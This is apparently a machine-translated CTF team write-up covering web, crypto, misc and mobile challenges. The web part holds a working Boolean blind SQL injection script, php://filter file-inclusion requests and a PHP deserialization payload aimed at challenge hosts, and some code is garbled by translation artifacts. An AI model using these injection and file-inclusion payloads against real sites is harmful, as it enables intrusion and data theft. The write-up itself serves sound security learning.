Foreword
Only the web, misc is written by me, the rest is written by the team’s master, I am Feiwu, that’s it
Web
Query
View the source code with hint login.php
, and then display the login interface
Use the universal password to log in, there is an echo
The echo is Successful login
Use the script to perform Boolean blind injection
import requests import string url="http://d574c221d2a0f4da.node.nsctf.cn/login.php" s=string.ascii_letters + string.digits flag='' for i in range(1,999): print(i) for j in range(32,128): # library name #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i} ,1))/**/like/**/{j},1,0)#" # Table Name #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where /**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#" # column names #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/ table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#" s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{<!- - -->i},1))/**/like/**/{<!-- -->j},1,0)#" data={<!-- --> 'username': s, 'password': 1 } r=requests. post(url, data=data) if "login successful" in r.text: flag + =chr(j) print(flag) break
Run the script to get the flag
Deserialization
Press f12 to get hint
//The location of the flag is at route.php $read = $_POST["read"]; $input = $_POST["input"]; if(!isset($read) or !isset($input)) {<!-- --> die("NONONO!"); } if(strpos($read, "f14g")===FALSE) {<!-- --> include($read); $input = unserialize($input); $input2 = clone $input; $input2->position = "route.php"; } else{<!-- --> die("NONONO!"); }
Construct payload to read source code of route.php
file
read=php://filter/read=convert.base64-encode/resource=route.php &input=1
The base decrypts to get the code:
<h1>Here can you find the position of the flag!</h1> <?php $position = "f14g.php"; $gadget = "h1nt.php"; ?>
View h1nt.php
in the same way:
read=php://filter/read=convert.base64-encode/resource=h1nt.php &input=1
Decrypted:
<?php class test {<!-- --> public $position; public function __clone(){<!-- --> echo file_get_contents($this->position); return $this->position; } } ?>
Then deserialize, so that the value of position
is set to read the payload of f14g.php
class test {<!-- --> public $position; public function __construct($position){<!-- --> $this->position = $position; } public function __clone(){<!-- --> echo file_get_contents($this->position); return $this->position; } } $input = new test("php://filter/read=convert.base64-encode/resource=f14g.php"); print(serialize($input).PHP_EOL);
incoming parameters
read=h1nt.php &input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode /resource=f14g.php";}
Base64 decryption to get flag
CodeCheck
f12 gets hint
$flag = "************"; if(!isset($_GET['a']) or !isset($_GET['b'])) {<!-- --> die("NONONO"); } if(file_get_contents($_GET['a'])!== "flag") {<!-- --> die("NONONO"); } if(file_get_contents($_GET['b'])!==$_GET['c']) {<!-- --> die("NONONO"); } if(isset($_GET['d'])) {<!-- --> include($_GET['d']); }
It means that the content of the file we want to pass into a
is flag
And it is necessary to make the file content of b
the same as the parameters passed in by c
Then pass in d and use the include()
function to read the file
get parameter
http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag & amp;b=data://text/plain,flag & amp;c=flag & amp; d=php://filter/read=convert.base64-encode/resource=index.php
Base64 decryption to get flag
Crypto
secret
e, phi is not mutually prime, the script is directly shuttled
p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038 543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656 065560178592346659948800891455240736405480828554486592172443394370831 q=14784744453415212899754693160229226609474088934715419242055490465181334091574432810410006537329434672396435673643670993 487174116132828694415024273344554222829303640465755616884472352181583668938718485687109102543489671060568859484740005168636 1372872763001355411405782508020591933546964183881743133374126947753 n=198501633144015525026544777517958899623243600649245949482311680927419516752629335736910709938637632909629451903724002625 265952244374639692383329275640852372717192986268779177925956037444338814099630462920952056868790150295866593848667195149481 816824277445553133828388057407236640508469500019163326313976062777038884929276358678705387095969939874392252478161379751566 571195093720230835077727303324827752584446114627710958963806449970113412650217191890982620727563420691892621881274280790174 18048118345180074280858160934483114966968365184788420091050933273417544493001214931876588653781824475472028383256488638441 92743 c=139133963667550106070434775525772682779282413191012153816623314980460806259028312024866460207675689218811851248949602428 672541629276054162284601083990874069892580370176396191955067110900128774541313835688327506061029011107820455292679405044713 228473648080947906626967854705948922447161372037818902842168740354863025060422634532555804753807429592013140037885536929779 143579969821183285871191241441812907533893941492353810453896968414714839473106633299938730461231345871496613479997749581050 911038063757023870841493095423515410211401110484082481214084016019791085107588915955500546997198017086462324271989022719536 73874 e=28 n = p * q phi = (p - 1) * (q - 1) t = gmpy2.gcd(e,phi) t1 = e // t dt1 = gmpy2.invert(t1,phi) mt1 = pow(c,dt1,n) s,m = gmpy2.iroot(mt1,t) print(long_to_bytes(s))
Morse’s Notebook
secret.txt
is a sentence, take out the punctuation marks separately
. ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . .
Guess it is Morse code, use online website to decrypt
PASSWORDISCONGRATS
, the guess is the Virginia password, decrypt the password given in the attachment, the key is tested to be congrats
ciphey solves the flag
RSA
The online website directly decomposes n-1 to get g
2 * 1346104232461691 *135708505946334625064263690521822985541406355995436858353723774763830387086504214757233911421189560 013585202467696506993984900376187580052410626083870574392838722601495658545778273522672899637362825029231312511794005808914 91236925451166755184695335564693793568286112036468975877609637392241679
Use the script to decrypt:
from Crypto.Util.number import inverse, long_to_bytes g = 1346104232461691 n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413 746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680 601926404543198957206717290905220235571289759182878331893962038379 c = 53299787294045228218904343000800279369478843982246530253220875423100579905797237830857610908246399655199253317454638697 9606697890310597738637156771564229 a = 26948584063125634344745539889044035975514843733583390925289130284541001118813681264939906571175716725103314111867456395 63619323775673115439 e = 65537 d = inverse(e, (a - 1) * (g - 1)) plaintext = pow(c, d, a * g) decrypted_message = long_to_bytes(plaintext) print("Decrypted message:", decrypted_message. decode())
get the flag
Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}
Misc
ZIP
The attachment is a compressed package, a password is required to decrypt it, but there is a hint
The art of 0 and 1, and it will remain shorter than 9.
Note that the password is only 0 and 1, and no more than 9 digits
Generating dictionaries with dictionary generators
Then perform dictionary blasting and decryption on the compressed package
Blow out the password and get the flag
Simple Document
010 Open the file and find the header of the PDF file
Separate files manually and save as PDF files
There is nothing in the pdf, so
Convert it to a word file, change the color and font, and get the flag
Mobile
peacock
1. The main logic is in the test, and it is found that the test library is loaded inside the test
2. Find the libtest.so file in lib and open it with ida
Found base64 encrypted ciphertext and table in the string window